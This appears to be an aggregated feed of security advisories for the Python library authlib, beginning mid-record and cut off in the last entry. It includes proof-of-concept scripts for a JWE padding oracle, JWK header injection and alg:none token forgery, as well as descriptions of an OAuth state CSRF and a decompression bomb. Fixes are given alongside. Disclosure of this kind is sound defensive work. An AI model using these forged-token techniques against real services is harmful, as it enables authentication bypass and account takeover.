f\"{RED}{mean_bad:\u003c14.3f}{R} \"\n          f\"{stdev_bad:\u003c14.3f} \"\n          f\"{min(times_bad):\u003c10.3f} \"\n          f\"{max(times_bad):.3f}\")\n    print(f\"  {'Padding valido (InvalidTag)':\u003c30} \"\n          f\"{GRN}{mean_good:\u003c14.3f}{R} \"\n          f\"{stdev_good:\u003c14.3f} \"\n          f\"{min(times_good):\u003c10.3f} \"\n          f\"{max(times_good):.3f}\")\n    print()\n\n    if delta \u003e 1.0:\n        vuln(f\"Delta medio: {delta:.3f} ms — timing oracle confirmado\")\n        info(f\"Diferencia de {delta:.1f}ms es suficiente para Bleichenbacher via red\")\n        info(f\"El ataque clasico funciona con diferencias de microsegundos\")\n    else:\n        ok(f\"Delta medio: {delta:.3f} ms — timing no es significativo\")\n\n\n# ─── test 4: confirmar RSA1_5 en registry por defecto ────────────────────────\n\ndef test_default_registry():\n    \"\"\"\n    @notice  Confirma que RSA1_5 esta registrado por defecto en authlib sin\n             ninguna configuracion adicional por parte del desarrollador.\n\n    @dev     Esto demuestra que cualquier aplicacion que use JsonWebEncryption()\n             sin configuracion explicita esta expuesta al oracle por defecto.\n             El desarrollador no necesita hacer nada malo — la exposicion es\n             out-of-the-box.\n    \"\"\"\n    header(\"TEST 4 - RSA1_5 en Registry por Defecto\")\n\n    jwe = JsonWebEncryption()\n\n    # intentar acceder al algoritmo RSA1_5 del registry\n    try:\n        alg = jwe.algorithms.get_algorithm(\"RSA1_5\")\n        if alg:\n            vuln(f\"RSA1_5 registrado por defecto: {alg.__class__.__name__}\")\n            info(\"Cualquier JsonWebEncryption() sin configuracion esta expuesto\")\n            info(\"No se requiere opt-in del desarrollador para el algoritmo vulnerable\")\n        else:\n            ok(\"RSA1_5 NO esta en el registry por defecto\")\n    except Exception as e:\n        info(f\"Registry check: {e}\")\n        # fallback: intentar deserializar un JWE con RSA1_5\n        private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)\n        header_b64  = urlsafe_b64encode(\n            to_bytes('{\"alg\":\"RSA1_5\",\"enc\":\"A128GCM\"}')\n        ).decode()\n        jwe_token = make_jwe(header_b64, os.urandom(256))\n        try:\n            jwe.deserialize_compact(jwe_token, private_key)\n        except Exception as e2:\n            if \"UnsupportedAlgorithm\" in str(type(e2).__name__):\n                ok(\"RSA1_5 NO soportado por defecto\")\n            else:\n                vuln(f\"RSA1_5 activo por defecto (error de desencriptacion, no de algoritmo): {type(e2).__name__}\")\n\n\n# ─── test 5: impacto del fix propuesto ────────────────────────────────────────\n\ndef test_fix_impact(private_key, header_b64):\n    \"\"\"\n    @notice  Demuestra que el fix propuesto elimina ambos oracles simultaneamente.\n    @dev     El fix parchado hace que ambos caminos retornen un CEK de longitud\n             correcta, forzando que el fallo ocurra downstream en AES-GCM tag\n             validation en ambos casos -\u003e misma excepcion, timing indistinguible.\n    \"\"\"\n    header(\"TEST 5 - Verificacion del Fix Propuesto\")\n\n    import os as _os\n    from cryptography.hazmat.primitives.ciphers.aead import AESGCM\n\n    def unwrap_patched(ek_bytes, expected_bits=128):\n        \"\"\"Replica del fix propuesto para RSAAlgorithm.unwrap()\"\"\"\n        expected_bytes = expected_bits // 8\n        try:\n            cek = private_key.decrypt(ek_bytes, asym_padding.PKCS1v15())\n        except ValueError:\n            cek = _os.urandom(expected_bytes)  # constant-time fallback\n        if len(cek) != expected_bytes:\n            cek = _os.urandom(expected_bytes)\n        return cek\n\n    # camino A con fix: padding invalido\n    cek_a = unwrap_patched(os.urandom(256))\n    info(f\"Fix Camino A (padding invalido): retorna CEK de {len(cek_a)*8} bits (random)\")\n\n    # camino B con fix: padding valido\n    valid_ek = private_key.public_key().encrypt(os.urandom(16), asym_padding.PKCS1v15())\n    cek_b = unwrap_patched(valid_ek)\n    info(f\"Fix Camino B (padding valido):   retorna CEK de {len(cek_b)*8} bits (real)\")\n\n    print()\n    ok(\"Ambos caminos retornan CEK de longitud correcta\")\n    ok(\"El fallo ocurrira downstream en AES-GCM para ambos casos\")\n    ok(\"Exception type sera identica en ambos caminos -\u003e oracle eliminado\")\n    ok(\"Timing sera indistinguible -\u003e timing oracle eliminado\")\n\n\n# ─── main ─────────────────────────────────────────────────────────────────────\n\nif __name__ == \"__main__\":\n    print(f\"\\n{BLD}authlib {authlib.__version__} / cryptography {cryptography.__version__}{R}\")\n    print(f\"authlib/jose/rfc7518/jwe_algs.py :: RSAAlgorithm.unwrap()\")\n\n    private_key, jwe, header_b64 = setup()\n\n    test_cryptography_behavior(private_key)\n    test_exception_oracle(private_key, jwe, header_b64)\n    test_timing_oracle(private_key, jwe, header_b64, iterations=50)\n    test_default_registry()\n    test_fix_impact(private_key, header_b64)\n\n    print(f\"\\n{DIM}Fix: capturar ValueError en unwrap() y retornar os.urandom(expected_bytes){R}\")\n    print(f\"{DIM}     nunca levantar excepcion que distinga padding failure de MAC failure{R}\\n\")\n```\n\n### Output\n\n```bash\nauthlib 1.6.8 / cryptography 46.0.5\nauthlib/jose/rfc7518/jwe_algs.py :: RSAAlgorithm.unwrap()\n\n\n----------------------------------------------------------------\nTEST 1 - Comportamiento de cryptography ante padding invalido\n----------------------------------------------------------------\n            cryptography retorno bytes: len=84\n            NOTA: esta version implementa mitigacion de random bytes\n\n----------------------------------------------------------------\nTEST 2 - Exception Oracle (tipo de excepcion diferente)\n----------------------------------------------------------------\n  [ORACLE]  Caso A (padding invalido):   ValueError: Invalid \"cek\" length\n  [OK]      Caso B (padding valido/MAC malo): InvalidTag: \n\n            Los dos caminos producen excepciones de clases DIFERENTES.\n            Un framework web que mapea excepciones a HTTP codes expone el oracle.\n            El atacante no necesita acceso al stack trace — solo al HTTP status code.\n\n----------------------------------------------------------------\nTEST 3 - Timing Oracle (50 iteraciones cada camino)\n----------------------------------------------------------------\n\n  Camino                         Media (ms)     Stdev (ms)     Min        Max\n  ------------------------------ -------------- -------------- ---------- ----------\n  Padding invalido (ValueError)  1.500          1.111          0.109      8.028\n  Padding valido (InvalidTag)    1.787          0.978          0.966      7.386\n\n  [OK]      Delta medio: 0.287 ms — timing no es significativo\n\n----------------------------------------------------------------\nTEST 4 - RSA1_5 en Registry por Defecto\n----------------------------------------------------------------\n            Registry check: 'JsonWebEncryption' object has no attribute 'algorithms'\n  [ORACLE]  RSA1_5 activo por defecto (error de desencriptacion, no de algoritmo): ValueError\n\n----------------------------------------------------------------\nTEST 5 - Verificacion del Fix Propuesto\n----------------------------------------------------------------\n            Fix Camino A (padding invalido): retorna CEK de 128 bits (random)\n            Fix Camino B (padding valido):   retorna CEK de 128 bits (real)\n\n  [OK]      Ambos caminos retornan CEK de longitud correcta\n  [OK]      El fallo ocurrira downstream en AES-GCM para ambos casos\n  [OK]      Exception type sera identica en ambos caminos -\u003e oracle eliminado\n  [OK]      Timing sera indistinguible -\u003e timing oracle eliminado\n\nFix: capturar ValueError en unwrap() y retornar os.urandom(expected_bytes)\n     nunca levantar excepcion que distinga padding failure de MAC failure\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-16T15:17:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-7432-952r-cw78","https://github.com/authlib/authlib/commit/48b345f29f6c459f11c6a40162b6c0b742ef2e22","https://github.com/authlib/authlib/releases/tag/v1.6.9","https://nvd.nist.gov/vuln/detail/CVE-2026-28490","https://github.com/advisories/GHSA-7432-952r-cw78"],"source_kind":"github","identifiers":["GHSA-7432-952r-cw78","CVE-2026-28490"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-16T16:00:09.308Z","updated_at":"2026-05-24T07:01:58.475Z","epss_percentage":0.00016,"epss_percentile":0.03905,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NDMyLTk1MnItY3c3OM4ABTqE","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03NDMyLTk1MnItY3c3OM4ABTqE","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.9","vulnerable_version_range":"\u003c= 1.6.8"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NDMyLTk1MnItY3c3OM4ABTqE/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13dndqLWN2cnAtN3B2Nc4ABTqD","url":"https://github.com/advisories/GHSA-wvwj-cvrp-7pv5","title":"Authlib JWS JWK Header Injection: Signature Verification Bypass","description":"## Description\n\n### Summary\n\nA JWK Header Injection vulnerability in `authlib`'s JWS implementation allows an unauthenticated\nattacker to forge arbitrary JWT tokens that pass signature verification. When `key=None` is passed\nto any JWS deserialization function, the library extracts and uses the cryptographic key embedded\nin the attacker-controlled JWT `jwk` header field. An attacker can sign a token with their own\nprivate key, embed the matching public key in the header, and have the server accept the forged\ntoken as cryptographically valid — bypassing authentication and authorization entirely.\n\nThis behavior violates **RFC 7515 §4.1.3** and the validation algorithm defined in **RFC 7515 §5.2**.\n\n### Details\n\n**Vulnerable file:** `authlib/jose/rfc7515/jws.py`  \n**Vulnerable method:** `JsonWebSignature._prepare_algorithm_key()`  \n**Lines:** 272–273\n\n```python\nelif key is None and \"jwk\" in header:\n    key = header[\"jwk\"]   # ← attacker-controlled key used for verification\n```\n\nWhen `key=None` is passed to `jws.deserialize_compact()`, `jws.deserialize_json()`, or\n`jws.deserialize()`, the library checks the JWT header for a `jwk` field. If present, it extracts\nthat value — which is fully attacker-controlled — and uses it as the verification key.\n\n**RFC 7515 violations:**\n\n- **§4.1.3** explicitly states the `jwk` header parameter is **\"NOT RECOMMENDED\"** because keys\n  embedded by the token submitter cannot be trusted as a verification anchor.\n- **§5.2 (Validation Algorithm)** specifies the verification key MUST come from the *application\n  context*, not from the token itself. There is no step in the RFC that permits falling back to\n  the `jwk` header when no application key is provided.\n\n**Why this is a library issue, not just a developer mistake:**\n\nThe most common real-world trigger is a **key resolver callable** used for JWKS-based key lookup.\nA developer writes:\n\n```python\ndef lookup_key(header, payload):\n    kid = header.get(\"kid\")\n    return jwks_cache.get(kid)   # returns None when kid is unknown/rotated\n\njws.deserialize_compact(token, lookup_key)\n```\n\nWhen an attacker submits a token with an unknown `kid`, the callable legitimately returns `None`.\nThe library then silently falls through to `key = header[\"jwk\"]`, trusting the attacker's embedded\nkey. The developer never wrote `key=None` — the library's fallback logic introduced it. The result\nlooks like a verified token with no exception raised, making the substitution invisible.\n\n**Attack steps:**\n\n1. Attacker generates an RSA or EC keypair.\n2. Attacker crafts a JWT payload with any desired claims (e.g. `{\"role\": \"admin\"}`).\n3. Attacker signs the JWT with their **private** key.\n4. Attacker embeds their **public** key in the JWT `jwk` header field.\n5. Attacker uses an unknown `kid` to cause the key resolver to return `None`.\n6. The library uses `header[\"jwk\"]` for verification — signature passes.\n7. Forged claims are returned as authentic.\n\n### PoC\n\nTested against **authlib 1.6.6** (HEAD `a9e4cfee`, Python 3.11).\n\n**Requirements:**\n```\npip install authlib cryptography\n```\n\n**Exploit script:**\n```python\nfrom authlib.jose import JsonWebSignature, RSAKey\nimport json\n\njws = JsonWebSignature([\"RS256\"])\n\n# Step 1: Attacker generates their own RSA keypair\nattacker_private = RSAKey.generate_key(2048, is_private=True)\nattacker_public_jwk = attacker_private.as_dict(is_private=False)\n\n# Step 2: Forge a JWT with elevated privileges, embed public key in header\nheader = {\"alg\": \"RS256\", \"jwk\": attacker_public_jwk}\nforged_payload = json.dumps({\"sub\": \"attacker\", \"role\": \"admin\"}).encode()\nforged_token = jws.serialize_compact(header, forged_payload, attacker_private)\n\n# Step 3: Server decodes with key=None — token is accepted\nresult = jws.deserialize_compact(forged_token, None)\nclaims = json.loads(result[\"payload\"])\nprint(claims)  # {'sub': 'attacker', 'role': 'admin'}\nassert claims[\"role\"] == \"admin\"  # PASSES\n```\n\n**Expected output:**\n```\n{'sub': 'attacker', 'role': 'admin'}\n```\n\n**Docker (self-contained reproduction):**\n```bash\nsudo docker run --rm authlib-cve-poc:latest \\\n  python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py\n```\n\n### Impact\n\nThis is an authentication and authorization bypass vulnerability. Any application using authlib's\nJWS deserialization is affected when:\n\n- `key=None` is passed directly, **or**\n- a key resolver callable returns `None` for unknown/rotated `kid` values (the common JWKS lookup pattern)\n\nAn unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims\n(admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys.\nThe forged token is indistinguishable from a legitimate one — no exception is raised.\n\nThis is a violation of **RFC 7515 §4.1.3** and **§5.2**. The spec is unambiguous: the `jwk`\nheader parameter is \"NOT RECOMMENDED\" as a key source, and the validation key MUST come from\nthe application context, not the token itself.\n\n**Minimal fix** — remove the fallback from `authlib/jose/rfc7515/jws.py:272-273`:\n```python\n# DELETE:\nelif key is None and \"jwk\" in header:\n    key = header[\"jwk\"]\n```\n\n**Recommended safe replacement** — raise explicitly when no key is resolved:\n```python\nif key is None:\n    raise MissingKeyError(\"No key provided and no valid key resolvable from context.\")\n```","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-03-16T15:17:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5","https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681","https://github.com/authlib/authlib/releases/tag/v1.6.9","https://nvd.nist.gov/vuln/detail/CVE-2026-27962","https://github.com/advisories/GHSA-wvwj-cvrp-7pv5"],"source_kind":"github","identifiers":["GHSA-wvwj-cvrp-7pv5","CVE-2026-27962"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-16T16:00:09.308Z","updated_at":"2026-05-24T07:01:58.476Z","epss_percentage":0.00081,"epss_percentile":0.23797,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13dndqLWN2cnAtN3B2Nc4ABTqD","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13dndqLWN2cnAtN3B2Nc4ABTqD","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.9","vulnerable_version_range":"\u003c= 1.6.8"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13dndqLWN2cnAtN3B2Nc4ABTqD/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03d2MyLXF4Z3ctZzhnZ84ABTIi","url":"https://github.com/advisories/GHSA-7wc2-qxgw-g8gg","title":"Authlib: Setting `alg: none` and a blank signature appears to bypass signature verification","description":"### Summary\nAfter upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected. \n\n### Details\nIt was likely introduced in this commit:\nhttps://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75\n\n### PoC\n```\nfrom authlib.jose import jwt, JsonWebKey\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\nimport json\nimport base64\n\n\ndef create_jwks():\n    private_key = rsa.generate_private_key(\n        public_exponent=65537, key_size=2048, backend=default_backend()\n    )\n    public_pem = private_key.public_key().public_bytes(\n        encoding=serialization.Encoding.PEM,\n        format=serialization.PublicFormat.SubjectPublicKeyInfo,\n    )\n    jwk = JsonWebKey.import_key(public_pem).as_dict()\n    jwk[\"kid\"] = \"test-key-001\"\n    jwk[\"use\"] = \"sig\"\n    jwk[\"alg\"] = \"RS256\"\n    jwks = {\"keys\": [jwk]}\n    return jwks\n\n\ndef create_forged_token_with_alg_none():\n    forged_header = {\"alg\": \"none\"}\n    forged_payload = {\n        \"sub\": \"user123\",\n        \"role\": \"admin\",\n        \"iat\": 1735603200,\n    }\n\n    header_b64 = base64.urlsafe_b64encode(\n        json.dumps(forged_header).encode(\"utf-8\")\n    ).rstrip(b\"=\")\n\n    payload_b64 = base64.urlsafe_b64encode(\n        json.dumps(forged_payload).encode(\"utf-8\")\n    ).rstrip(b\"=\")\n\n    forged_token = header_b64 + b\".\" + payload_b64 + b\".\"\n    return forged_token\n\n\njwks = create_jwks()\nforged_token = create_forged_token_with_alg_none()\ntry:\n    claims = jwt.decode(forged_token, jwks)\n    print(f\"VULNERABLE: Forged token (alg:none) accepted: role={claims['role']}\")\nexcept Exception as e:\n    print(f\"SECURE: Token rejected - {type(e).__name__}\")\n```\n\nOutput:\n```\npip install -q authlib==1.5.2\npython3 authlib_alg_none_vulnerability.py \nSECURE: Token rejected - BadSignatureError\npip install -q authlib==1.6.5\npython3 authlib_alg_none_vulnerability.py \nVULNERABLE: Forged token (alg:none) accepted: role=admin\n```\n\n### Impact\nUsers of the library are likely not aware that they now need to check the provided headers and disallow `alg: none` usage, it is not obvious from the release notes that any action needs to be taken. As a best-practice, the library should adopt a 'secure by default' stance and default to rejecting it and allow the application to provide an algorithm whitelist.\n\nApplications using this library for authentication or authorization may accept malicious, forged JWTs, leading to:\n- Authentication bypass\n- Privilege escalation\n- Unauthorized access\n- Modification of application data","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-04T20:55:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg","https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75","https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7","https://nvd.nist.gov/vuln/detail/CVE-2026-28802","https://github.com/advisories/GHSA-7wc2-qxgw-g8gg"],"source_kind":"github","identifiers":["GHSA-7wc2-qxgw-g8gg","CVE-2026-28802"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-04T21:00:09.631Z","updated_at":"2026-05-14T12:01:35.678Z","epss_percentage":0.00019,"epss_percentile":0.05236,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03d2MyLXF4Z3ctZzhnZ84ABTIi","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03d2MyLXF4Z3ctZzhnZ84ABTIi","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.7","vulnerable_version_range":"\u003e= 1.6.5, \u003c= 1.6.6"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03d2MyLXF4Z3ctZzhnZ84ABTIi/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mZzZmLTc1anEtNjUyM84ABQ35","url":"https://github.com/advisories/GHSA-fg6f-75jq-6523","title":"Authlib has 1-click Account Takeover vulnerability","description":"# Security Advisory: Cache-Backed State Storage CSRF in Authlib\n\nThe Security Labs team at Snyk has reported a security issue affecting Authlib, identified during a recent research project.\n\nThe Snyk Security Labs team has identified a vulnerability that can result in a one-click account takeover in applications that utilize the Authlib library.\n\n## Description\n\nCache-backed state/request-token storage is not tied to the initiating user session, making CSRF possible for any attacker that possesses a valid state value (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, `FrameworkIntegration.set_state_data` writes the entire state blob under `_state_{app}_{state}`, and `get_state_data` disregards the caller's session entirely. [1][2]\n\n```py\n    def _get_cache_data(self, key):\n        value = self.cache.get(key)\n        if not value:\n            return None\n        try:\n            return json.loads(value)\n        except (TypeError, ValueError):\n            return None\n[snip]\n    def get_state_data(self, session, state):\n        key = f\"_state_{self.name}_{state}\"\n        if self.cache:\n            value = self._get_cache_data(key)\n        else:\n            value = session.get(key)\n        if value:\n            return value.get(\"data\")\n        return None\n```\n\n*authlib/integrations/base_client/framework_integration.py:12-41*\n\nRetrieval in `authorize_access_token` therefore succeeds for whichever browser presents that opaque value, and the token exchange proceeds with the attacker's authorization code. [3]\n\n```py\n    def authorize_access_token(self, **kwargs):\n        \"\"\"Fetch access token in one step.\n\n        :return: A token dict.\n        \"\"\"\n        params = request.args.to_dict(flat=True)\n        state = params.get(\"oauth_token\")\n        if not state:\n            raise OAuthError(description='Missing \"oauth_token\" parameter')\n\n        data = self.framework.get_state_data(session, state)\n        if not data:\n            raise OAuthError(description='Missing \"request_token\" in temporary data')\n\n        params[\"request_token\"] = data[\"request_token\"]\n        params.update(kwargs)\n        self.framework.clear_state_data(session, state)\n        token = self.fetch_access_token(**params)\n        self.token = token\n        return token\n```\n\n*authlib/integrations/flask_client/apps.py:57-76*\n\nThis opens up an avenue for Login CSRF in applications that use cache-backed storage. Depending on the dependent application's implementation (e.g., whether it links accounts in the event of a login CSRF), this could lead to account takeover.\n\n## Proof of Concept\n\nConsider a hypothetical application — AwesomeAuthlibApp. Assume that AwesomeAuthlibApp contains internal logic such that, when an already authenticated user performs a `callback` request, the application links the newly provided SSO identity to the existing user account associated with that request.\n\nUnder these conditions, an attacker can achieve account takeover within the application by performing the following actions:\n\n1. The attacker initiates an SSO OAuth flow but halts the process immediately before the callback request is made to AwesomeAuthlibApp.\n2. The attacker then induces a logged-in user (via phishing, a drive-by attack, or similar means) to perform a GET request containing the attacker's state value and authorization code to the AwesomeAuthlibApp callback endpoint. Because Authlib does not verify whether the state token is bound to the session performing the callback, the callback is processed, the authorization code is sent to the provider, and the account linking proceeds.\n\nOnce the GET request is executed, the attacker's SSO account becomes permanently linked to the victim's AwesomeAuthlibApp account.\n\n## Suggested Fix\n\nPer the OAuth RFC [4], the state parameter should be tied to the user's session to prevent exactly such scenarios. One straightforward method of mitigating this issue is to continue storing the state in the session even when caching is enabled.\n\nAn alternative approach would be to hash the session ID (or another per-user secret derived from the session) into the cache key. This ensures the state remains stored in the cache while still being bound to the session of the user that initiated the OAuth flow.\n\n## Resources\n\n- [1] [flask_client/apps.py#L35](https://github.com/authlib/authlib/blob/260d04edee23d8470057ea659c16fb8a2c7b0dc2/authlib/integrations/flask_client/apps.py#L35)\n- [2] [base_client/framework_integration.py#L33](https://github.com/authlib/authlib/blob/260d04edee23d8470057ea659c16fb8a2c7b0dc2/authlib/integrations/base_client/framework_integration.py#L33)\n- [3] [flask_client/apps.py#L57](https://github.com/authlib/authlib/blob/260d04edee23d8470057ea659c16fb8a2c7b0dc2/authlib/integrations/flask_client/apps.py#L57)\n- [4] [RFC 6749 §10.12](https://www.rfc-editor.org/rfc/rfc6749#section-10.12)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-01-08T22:40:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523","https://nvd.nist.gov/vuln/detail/CVE-2025-68158","https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489","https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228","https://github.com/advisories/GHSA-fg6f-75jq-6523"],"source_kind":"github","identifiers":["GHSA-fg6f-75jq-6523","CVE-2025-68158"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-08T23:00:07.790Z","updated_at":"2026-06-09T13:01:35.409Z","epss_percentage":0.00017,"epss_percentile":0.04175,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mZzZmLTc1anEtNjUyM84ABQ35","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mZzZmLTc1anEtNjUyM84ABQ35","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.6","vulnerable_version_range":"\u003e= 1.0.0, \u003c= 1.6.5"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mZzZmLTc1anEtNjUyM84ABQ35/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nN2YzLTgyOGYtN2g3bc4ABNQ9","url":"https://github.com/advisories/GHSA-g7f3-828f-7h7m","title":"Authlib : JWE zip=DEF decompression bomb enables DoS","description":"### Summary\n_Authlib’s JWE `zip=DEF` path performs unbounded DEFLATE decompression. A very small ciphertext can expand into tens or hundreds of megabytes on decrypt, allowing an attacker who can supply decryptable tokens to exhaust memory and CPU and cause denial of service._\n\n### Details\n- Affected component: Authlib JOSE, JWE `zip=DEF` (DEFLATE) support.\n- In `authlib/authlib/jose/rfc7518/jwe_zips.py`, `DeflateZipAlgorithm.decompress` calls `zlib.decompress(s, -zlib.MAX_WBITS)` without a maximum output limit. This permits unbounded expansion of compressed payloads.\n- In the JWE decode flow (`authlib/authlib/jose/rfc7516/jwe.py`), when the protected header contains `\"zip\": \"DEF\"`, the library routes the decrypted ciphertext into the `decompress` method and assigns the fully decompressed bytes to the plaintext field before returning it. No streaming limit or quota is applied.\n- Because DEFLATE achieves extremely high ratios on highly repetitive input, an attacker can craft a tiny `zip=DEF` ciphertext that inflates to a very large plaintext during decrypt, spiking RSS and CPU. Repeated requests can starve the process or host.\n\nCode references (from this repository version):\n- `authlib/authlib/jose/rfc7518/jwe_zips.py` – `DeflateZipAlgorithm.decompress` uses unbounded `zlib.decompress`.\n- `authlib/authlib/jose/rfc7516/jwe.py` – JWE decode path applies `zip_.decompress(msg)` when `zip=DEF` is present in the header.\n\nContrast: The `joserfc` project guards `zip=DEF` decompression with a fixed maximum (256 KB) and raises `ExceededSizeError` if output would exceed this limit, preventing the bomb. Authlib lacks such a guard in this codebase snapshot.\n\n### PoC\nEnvironment: Python 3.10+ inside a venv; Authlib installed editable from this repository so source changes are visible. The PoC script demonstrates both a benign and a compressible-bomb payload and prints wall/CPU time, RSS, and size ratios.\n\n1) Create venv and install Authlib (editable):\nSet current directory to /authlib\nDownload [jwe_deflate_dos_demo.py](https://github.com/user-attachments/files/22519553/jwe_deflate_dos_demo.py) in /authlib\n```\npython3 -m venv .venv\n.venv/bin/pip install --upgrade pip\n.venv/bin/pip install -e .\n```\n\n2) Run the PoC (included in this repo):\n```\n.venv/bin/python /authlib/jwe_deflate_dos_demo.py --size 50 --max-rss-mb 2048\n```\n\nSample output (abridged):\n```\nLOCAL TEST ONLY – do not send to third-party systems.\nRuntime: Python 3.13.6 / Authlib 1.6.4 / zip=DEF via A256GCM\n[CASE] normal    plaintext=13B  ciphertext=117B decompressed=13B  wall_s=0.000 cpu_s=0.000 peak_rss_mb=31.0  ratio=0.1\n[CASE] malicious plaintext=50MB ciphertext=~4KB decompressed=50MB wall_s=~2.3  cpu_s=~2.2  peak_rss_mb=800+  ratio=12500+\n```\n\nThe second case shows the decompression spike: a few KB of ciphertext forces allocation and processing of ~50 MB during decrypt. Repeated requests can quickly exhaust available memory and CPU.\n\nReproduction notes:\n- Algorithm: `alg=dir`, `enc=A256GCM`, header includes `{ \"zip\": \"DEF\" }`.\n- The PoC uses a 32‑byte local symmetric key and a highly compressible payload (`\"A\" * N`).\n- Increase `--size` to stress memory; the `--max-rss-mb` flag helps avoid destabilizing the host during testing.\n\n### Impact\n- Effect: Denial of service (memory/CPU exhaustion) during JWE decrypt of `zip=DEF` tokens.\n- Who is impacted: Any service that uses Authlib to decrypt JWE tokens with `zip=DEF` and where an attacker can submit tokens that will be successfully decrypted (e.g., shared `dir` key, token reflection, or compromised/abused issuers).\n- Confidentiality/Integrity: No direct C/I impact; availability impact is high.\n\n### Severity (CVSS v3.1)\nBase vector (typical shared‑secret scenario where the attacker must produce a decryptable token):\n- `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` → 6.5 (MEDIUM)\n\n**Rationale:**\n- Network‑reachable (AV:N), low complexity (AC:L), no user interaction (UI:N), scope unchanged (S:U).\n- Attacker must hold or gain ability to mint a decryptable token for the target (PR:L) — common with `alg=dir` and shared keys across services.\n- No confidentiality or integrity loss (C:N/I:N); availability is severely impacted (A:H) due to decompression expansion.\nIf arbitrary unprivileged parties can submit JWEs that will be decrypted (PR:N), the base vector becomes:\n- `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` → 7.5 (HIGH)\n\n### Mitigations / Workarounds\n- Reject or strip `zip=DEF` for inbound JWEs at the application boundary until a fix is available.\n- Fork and add a bounded decompression guard (e.g., `zlib.decompress(..., max_length)` via `decompressobj().decompress(data, MAX_SIZE)`), returning an error when output exceeds a safe limit.\n- Enforce strict maximum token sizes and fail fast on oversized inputs; combine with rate limiting.\n\n### Remediation Guidance (for maintainers)\n- Mirror `joserfc`’s approach: add a conservative maximum output size (e.g., 256 KB by default) and raise a specific error when exceeded; document a controlled way to raise this ceiling for trusted environments.\n- Consider streaming decode with chunked limits to avoid large single allocations.\n\n### References\n- Authlib source: `authlib/authlib/jose/rfc7518/jwe_zips.py`, 